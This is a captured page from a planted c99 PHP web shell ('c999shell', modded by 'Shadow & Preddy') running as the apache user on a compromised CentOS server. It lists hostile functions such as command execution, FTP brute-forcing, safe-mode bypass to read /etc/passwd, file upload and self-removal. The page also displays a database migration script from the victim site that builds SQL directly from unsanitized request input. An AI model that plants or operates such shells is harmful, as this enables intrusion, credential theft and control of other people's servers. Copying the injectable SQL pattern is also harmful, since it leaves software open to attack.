!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/migrate/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (7.87 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    
if(isset($_REQUEST["submit"])){
    
        
$error = array(falsefalsefalsefalsefalse);
        
        if(empty(
$_REQUEST["host"])) $error[0] = true;
        if(empty(
$_REQUEST["user"])) $error[1] = true;
        if(empty(
$_REQUEST["pass"])) $error[2] = true;
        if(empty(
$_REQUEST["DBOld"])) $error[3] = true;
        if(empty(
$_REQUEST["DBNew"])) $error[4] = true;

        
$pass true;
        for(
$i=0;$i<sizeof($error);$i++){
            if(
$error[$i]) {
                
$pass false;
            }
        }

        if(
$pass){
            
            
// -- Common Data Tables List. -- //
            //$tableList = array("accessories_tb", "autocar_tb", "automobile_tb", "budget_year_tb", "building_tb", "comment_tb", "committee_tb", "degree_his_tb", "degree_type_tb", "durable_tb", "edu_product_tb", "edu_project_tb", "edu_service_tb", "facultycon_tb", "faculty_tb", "finance2_tb", "finance3_tb", "finance4_tb", "finance_tb", "formaoffice", "formation_tb", "formcaroffice", "formproject", "formproject_edit_tb", "history_absent_tb", "history_accumu", "history_decoration_tb", "history_position_tb", "instructor_tb", "manament_tb", "mapcollege_tb", "money_source_tb", "personal_tb", "position_tb", "project_tb", "project_type_tb", "research_char_tb", "research_filetex_tb", "research_file_tb", "research_public_tb", "research_success_tb", "research_tb", "res_project_tb", "room_tb", "salary_repot_tb", "salary_tb", "salary_type_tb", "state_tb", "stu_notebook", "techplan_method_tb", "training_tb", "user_tb");

            // -- Migrate Incorrect Table(For Migrate Data Already) -- //
            //$tableList = array("edu_product_tb", "edu_project_tb", "edu_service_tb", "finance2_tb", "finance3_tb", "finance4_tb", "instructor_tb");
            
            // -- Extra Data Tables List (with qa_result_tb table)--//
            //$tableList = array("dev_coursedu", "dev_his", "dev_hreduhis", "dev_hrperson", "projectcode_tb", "projectname", "projectqa_type_tb", "projectstdplan_tb", "projectstra_type_tb", "project_mission", "project_plan", "project_plan_temp", "project_report_tb", "project_submission", "project_type_temp", "project_year", "projstrategy_tb", "proplanstrateg_tb", "prostrategymap_tb", "qa_data_tb", "qa_elements", "qa_elements_tb", "qa_indicator", "qa_indicatorpi_tb", "qa_indicator_tb", "qa_performance", "qa_pi_cri_tb", "qa_project_tb", "qa_qareport_tb", "qa_report_tb", "qa_result_indicator", "qa_result_standard", "qa_result_tb", "qa_standard_result", "qa_standard_tb", "teach_ingmethod", "teach_lessonplans", "tech_categorydetail", "tech_categoryplan", "tech_categorytopic", "tech_corseplan_tb", "tech_coseoutcom", "tech_courseteacher", "tech_imgmethod_tb", "tech_lesson_plans", "tech_methodcom_tb", "tech_outcom", "tech_outcom_tb", "tech_planmethod", "tech_plan_tb", "tech_spec_tb", "tech_text_tb");

            // -- Extra Data Tables List (without qa_result_tb table)--//
            //$tableList = array("dev_coursedu", "dev_his", "dev_hreduhis", "dev_hrperson", "projectcode_tb", "projectname", "projectqa_type_tb", "projectstdplan_tb", "projectstra_type_tb", "project_mission", "project_plan", "project_plan_temp", "project_report_tb", "project_submission", "project_type_temp", "project_year", "projstrategy_tb", "proplanstrateg_tb", "prostrategymap_tb", "qa_data_tb", "qa_elements", "qa_elements_tb", "qa_indicator", "qa_indicatorpi_tb", "qa_indicator_tb", "qa_performance", "qa_pi_cri_tb", "qa_project_tb", "qa_qareport_tb", "qa_report_tb", "qa_result_indicator", "qa_result_standard", "qa_standard_result", "qa_standard_tb", "teach_ingmethod", "teach_lessonplans", "tech_categorydetail", "tech_categoryplan", "tech_categorytopic", "tech_corseplan_tb", "tech_coseoutcom", "tech_courseteacher", "tech_imgmethod_tb", "tech_lesson_plans", "tech_methodcom_tb", "tech_outcom", "tech_outcom_tb", "tech_planmethod", "tech_plan_tb", "tech_spec_tb", "tech_text_tb");

            
$conn mysql_connect($_REQUEST["host"], $_REQUEST["user"], $_REQUEST["pass"]) or die("ไม่สามารถติดต่อฐานข้อมูลได้");
            
            echo 
"<br>--<br>";
            echo 
"-- Copy SQL ทั้งหมดไปวางใน phpMyAdmin<br>";
            echo 
"--<br><br>";

            foreach(
$tableList as $tableName){
                
$query1 "SELECT * FROM ".$_REQUEST["DBOld"].".".$tableName."";
                
$query2 "SELECT * FROM ".$_REQUEST["DBNew"].".".$tableName."";

                
// get the result from the DB
                
$result1 mysql_query($query1);
                
$result2 mysql_query($query2);

                if(
mysql_num_fields($result1)){
                    
// Lists field name From MIS DB OLD
                    
unset($fieldDBOld);
                    for (
$i=0;$i<mysql_num_fields($result1);++$i){
                        
$fieldDBOld[] = mysql_field_name($result1$i);
                    }
                    
                    
// Lists field name From MIS DB NEW
                    
unset($fieldDBNew);
                    for (
$i=0;$i<mysql_num_fields($result2);++$i){
                        
$fieldDBNew[] = mysql_field_name($result2$i);
                    }
                    
                    echo 
"--<br>";
                    echo 
"-- ตาราง : $tableName<br>";                
                    echo 
"--<br><br>";

                    echo 
"TRUNCATE ".$_REQUEST["DBNew"].".`$tableName`;<br><br>";
                    
                    unset(
$field);
                    for(
$i=0;$i<sizeof($fieldDBOld);$i++){
                        if(
in_array($fieldDBOld[$i],$fieldDBNew)) 
                            
$field .= (empty($field))?"`".$fieldDBOld[$i]."`":", `".$fieldDBOld[$i]."`";                        
                    }
                    
                    echo 
"INSERT INTO ".$_REQUEST["DBNew"].".".$tableName."(".$field.") SELECT ".$field." FROM ".$_REQUEST["DBOld"].".".$tableName.";<br><br>";

                    echo 
"-- จำนวนแถวข้อมูล : ".mysql_num_rows($result1)." แถว<br><br>";
                    echo 
"-- --------------------------------------<br><br>";
                }
                else{
                    echo 
"--<br>";
                    echo 
"-- $tableName<br>";
                    echo 
"--<br><br>";
                    echo 
"-- ไม่พบ ตาราง $tableName ในฐานข้อมูล ".$_REQUEST["DBOld"]."<br><br>";
                    echo 
"-- --------------------------------------<br><br>";
                }

            }

        }
    }
?>

<? if(!isset($pass) || (isset($pass) && $pass==false)){?>
    <table width="100%" align="center">
        <tr>
            <td>
                <FORM METHOD="POST" NAME="migrateForm" ACTION="">            
                <table width="60%" align="center">
                    <tr>
                        <td colspan="2" height="50" align="center"><h3>MIS MIGRATE</h3></td>
                    </tr>
                    <tr>
                        <td width="40%" height="30" align="right">Host:</td>
                        <td width="60%" align="left"><INPUT TYPE="text" NAME="host" value="<?=(isset($_REQUEST["host"]))?$_REQUEST["host"]:"localhost";?><?=(isset($error) && $error[0]==true)?"style=\"border-style:solid;border-width:1px;border-color:darkred;background-color:#FF3333;\"":""?>></td>
                    </tr>
                    <tr>
                        <td width="40%" height="30" align="right">Username:</td>
                        <td width="60%" align="left"><INPUT TYPE="text" NAME="user" value="<?=(isset($_REQUEST["user"]))?$_REQUEST["user"]:"root";?><?=(isset($error) && $error[1]==true)?"style=\"border-style:solid;border-width:1px;border-color:darkred;background-color:#FF3333;\"":""?>></td>
                    </tr>
                    <tr>
                        <td width="40%" height="30" align="right">Password:</td>
                        <td width="60%" align="left"><INPUT TYPE="password" NAME="pass" value="<?=(isset($_REQUEST["pass"]))?$_REQUEST["pass"]:"";?><?=(isset($error) && $error[2]==true)?"style=\"border-style:solid;border-width:1px;border-color:darkred;background-color:#FF3333;\"":""?>></td>
                    </tr>
                    <tr>
                        <td width="40%" height="30" align="right">MIS DB(เก่า):</td>
                        <td width="60%" align="left"><INPUT TYPE="text" NAME="DBOld" value="<?=(isset($_REQUEST["DBOld"]))?$_REQUEST["DBOld"]:"";?><?=(isset($error) && $error[3]==true)?"style=\"border-style:solid;border-width:1px;border-color:darkred;background-color:#FF3333;\"":""?>></td>
                    </tr><tr>
                        <td width="40%" height="30" align="right">MIS DB(ใหม่):</td>
                        <td width="60%" align="left"><INPUT TYPE="text" NAME="DBNew" value="<?=(isset($_REQUEST["DBNew"]))?$_REQUEST["DBNew"]:"";?><?=(isset($error) && $error[4]==true)?"style=\"border-style:solid;border-width:1px;border-color:darkred;background-color:#FF3333;\"":""?>></td>
                    </tr>
                    <tr>
                        <td colspan="2" height="50" align="center"><INPUT TYPE="submit" name="submit" value="ยืนยัน" style="cursor:pointer" title="คลิ๊กที่นี่เพื่อเริ่ม Migrate ข้อมูล"></td>
                    </tr>
                </table>
                </FORM>
            </td>
        </tr>
    </table>
<? }?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0176 ]--